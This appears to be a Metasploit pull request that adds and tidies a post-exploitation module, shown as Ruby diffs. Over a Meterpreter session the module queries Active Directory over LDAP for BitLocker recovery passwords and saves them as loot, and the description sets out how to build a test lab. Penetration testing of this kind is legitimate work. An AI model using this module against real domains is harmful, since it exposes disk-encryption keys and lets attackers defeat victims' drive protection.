### PR TITLE
Post::Windows - Recover Bitlocker Recovery Keys

### DIFF
--- a/modules/post/windows/gather/enum_ad_bitlocker.rb
+++ b/modules/post/windows/gather/enum_ad_bitlocker.rb
@@ -30,7 +30,6 @@ class Metasploit3 < Msf::Post
       ))
 
     register_options([
-      OptInt.new('MAX_SEARCH', [true, 'Maximum values to retrieve, 0 for all.', 50]),
       OptBool.new('STORE_LOOT', [true, 'Store file in loot.', false]),
       OptString.new('FIELDS', [true, 'FIELDS to retrieve.', 'distinguishedName,msFVE-RecoveryPassword']),
       OptString.new('FILTER', [true, 'Search filter.', '(objectClass=msFVE-RecoveryInformation)'])

--- a/modules/post/windows/gather/enum_ad_bitlocker.rb
+++ b/modules/post/windows/gather/enum_ad_bitlocker.rb
@@ -1,0 +1,86 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex'
+require 'msf/core'
+require 'msf/core/auxiliary/report'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Auxiliary::Report
+  include Msf::Post::Windows::LDAP
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'	       => 'Windows Gather Active Directory Bitlocker Recovery',
+        'Description'  => %Q{
+            This module will enumerate bitlocker reocvery passwords in the default AD
+            directory. Requires Domain Admin or other delegated privileges.
+        },
+        'License'      => MSF_LICENSE,
+        'Author'       => [ 'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' ],
+        'Platform'     => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'References'   =>
+        [
+          ['URL', 'tbc'],
+        ]
+      ))
+
+    register_options([
+      OptInt.new('MAX_SEARCH', [true, 'Maximum values to retrieve, 0 for all.', 50]),
+      OptBool.new('STORE_LOOT', [true, 'Store file in loot.', false]),
+      OptString.new('FIELDS', [true, 'FIELDS to retrieve.', 'distinguishedName,msFVE-RecoveryPassword']),
+      OptString.new('FILTER', [true, 'Search filter.', '(objectClass=msFVE-RecoveryInformation)'])
+    ], self.class)
+  end
+
+  def run
+    fields = datastore['FIELDS'].gsub(/\s+/,"").split(',')
+    search_filter = datastore['FILTER']
+    max_search = datastore['MAX_SEARCH']
+    q = query(search_filter, max_search, fields)
+
+    if q.nil? or q[:results].empty?
+      return
+    end
+
+    # Results table holds raw string data
+    results_table = Rex::Ui::Text::Table.new(
+        'Header'     => "Bitlocker Recovery Passwords",
+        'Indent'     => 1,
+        'SortIndex'  => -1,
+        'Columns'    => fields
+      )
+
+    # Reports are collections for easy database insertion
+    reports = []
+    q[:results].each do |result|
+      row = []
+
+      report = {}
+      0.upto(fields.length-1) do |i|
+        if result[i].nil?
+          field = ""
+        else
+          field = result[i]
+        end
+
+        row << field
+      end
+
+      reports << report
+      results_table << row
+    end
+
+    print_line results_table.to_s
+    if datastore['STORE_LOOT']
+      stored_path = store_loot('bitlocker.recovery', 'text/plain', session, results_table.to_csv)
+      print_status("Results saved to: #{stored_path}")
+    end
+  end
+
+end
+

--- a/modules/post/windows/gather/enum_ad_bitlocker.rb
+++ b/modules/post/windows/gather/enum_ad_bitlocker.rb
@@ -8,69 +8,60 @@ require 'msf/core'
 require 'msf/core/auxiliary/report'
 
 class Metasploit3 < Msf::Post
-
   include Msf::Auxiliary::Report
   include Msf::Post::Windows::LDAP
 
-  def initialize(info={})
-    super( update_info( info,
-        'Name'	       => 'Windows Gather Active Directory Bitlocker Recovery',
-        'Description'  => %Q{
-            This module will enumerate bitlocker reocvery passwords in the default AD
-            directory. Requires Domain Admin or other delegated privileges.
-        },
-        'License'      => MSF_LICENSE,
-        'Author'       => [ 'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' ],
-        'Platform'     => [ 'win' ],
-        'SessionTypes' => [ 'meterpreter' ],
-        'References'   =>
-        [
-          ['URL', 'tbc'],
-        ]
-      ))
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'Windows Gather Active Directory Bitlocker Recovery',
+      'Description'  => %(
+          This module will enumerate bitlocker reocvery passwords in the default AD
+          directory. Requires Domain Admin or other delegated privileges.
+                              ),
+      'License'      => MSF_LICENSE,
+      'Author'       => [ 'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' ],
+      'Platform'     => [ 'win' ],
+      'SessionTypes' => [ 'meterpreter' ],
+      'References'   =>
+      [
+        ['URL', 'https://technet.microsoft.com/en-us/library/cc771778%28v=ws.10%29.aspx']
+      ]
+    ))
 
     register_options([
-      OptBool.new('STORE_LOOT', [true, 'Store file in loot.', false]),
+      OptBool.new('STORE_LOOT', [true, 'Store file in loot.', true]),
       OptString.new('FIELDS', [true, 'FIELDS to retrieve.', 'distinguishedName,msFVE-RecoveryPassword']),
       OptString.new('FILTER', [true, 'Search filter.', '(objectClass=msFVE-RecoveryInformation)'])
     ], self.class)
   end
 
   def run
-    fields = datastore['FIELDS'].gsub(/\s+/,"").split(',')
+    fields = datastore['FIELDS'].gsub(/\s+/, "").split(',')
     search_filter = datastore['FILTER']
     max_search = datastore['MAX_SEARCH']
     q = query(search_filter, max_search, fields)
 
-    if q.nil? or q[:results].empty?
+    if q.nil? || q[:results].empty?
+      print_status('No results found...')
       return
     end
 
     # Results table holds raw string data
     results_table = Rex::Ui::Text::Table.new(
-        'Header'     => "Bitlocker Recovery Passwords",
-        'Indent'     => 1,
-        'SortIndex'  => -1,
-        'Columns'    => fields
-      )
+      'Header'     => 'Bitlocker Recovery Passwords',
+      'Indent'     => 1,
+      'SortIndex'  => -1,
+      'Columns'    => fields
+    )
 
-    # Reports are collections for easy database insertion
-    reports = []
     q[:results].each do |result|
       row = []
 
-      report = {}
-      0.upto(fields.length-1) do |i|
-        if result[i].nil?
-          field = ""
-        else
-          field = result[i]
-        end
-
-        row << field
+      result.each do |field|
+        field_value = (field.nil? ? '' : field[:value])
+        row << field_value
       end
 
-      reports << report
       results_table << row
     end
 
@@ -80,6 +71,4 @@ class Metasploit3 < Msf::Post
       print_status("Results saved to: #{stored_path}")
     end
   end
-
 end
-

--- a/modules/post/windows/gather/enum_ad_bitlocker.rb
+++ b/modules/post/windows/gather/enum_ad_bitlocker.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Post
     super(update_info(info,
       'Name'         => 'Windows Gather Active Directory BitLocker Recovery',
       'Description'  => %(
-          This module will enumerate BitLocker reocvery passwords in the default AD
+          This module will enumerate BitLocker recovery passwords in the default AD
           directory. Requires Domain Admin or other delegated privileges.
       ),
       'License'      => MSF_LICENSE,

--- a/modules/post/windows/gather/enum_ad_bitlocker.rb
+++ b/modules/post/windows/gather/enum_ad_bitlocker.rb
@@ -13,11 +13,11 @@ class Metasploit3 < Msf::Post
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'         => 'Windows Gather Active Directory Bitlocker Recovery',
+      'Name'         => 'Windows Gather Active Directory BitLocker Recovery',
       'Description'  => %(
-          This module will enumerate bitlocker reocvery passwords in the default AD
+          This module will enumerate BitLocker reocvery passwords in the default AD
           directory. Requires Domain Admin or other delegated privileges.
-                              ),
+      ),
       'License'      => MSF_LICENSE,
       'Author'       => [ 'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' ],
       'Platform'     => [ 'win' ],
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Post
 
     # Results table holds raw string data
     results_table = Rex::Ui::Text::Table.new(
-      'Header'     => 'Bitlocker Recovery Passwords',
+      'Header'     => 'BitLocker Recovery Passwords',
       'Indent'     => 1,
       'SortIndex'  => -1,
       'Columns'    => fields


### PR DESCRIPTION
This is a tidyup after some LDAP/ADSI refactors of https://github.com/rapid7/metasploit-framework/pull/2904

I was able to use a Windows 10 preview in VMWare to encrypt the HDD. Previously I wasn't able to do this as it can't see the TPM? It may be easier to do this via a second 'removable HDD' rather than the OS disk.
## Verification
- Create a Bitlocker Group Policy Attribute with the following attributes:
  - Computer Configuration > Administrative Templates > Windows Components > Bitlocker Drive Encryption > Store BitLocker recovery information in Active Directory Domain Services
  - Enabled
  - Require BitLocker backup to AD DS
  - Also Bitlocker Drive Encryption > Operating System Drives > Choose how BitLocker-protected operating system drives can be recovered
    - Save BitLocker recovery information to AD DS for operating system drives
- gpupdate /force on target OS.
- Enable BitLocker on target OS. 
- [ ] Optional - Install the BitLocker Drive Encryption Administration Utilities on the Domain Controller check to see if is visible - https://technet.microsoft.com/en-us/library/dd759200.aspx?f=255&MSPPError=-2147217396
- [ ] Run module, as Domain Administrator, or other privileged account, see recovery passwords.
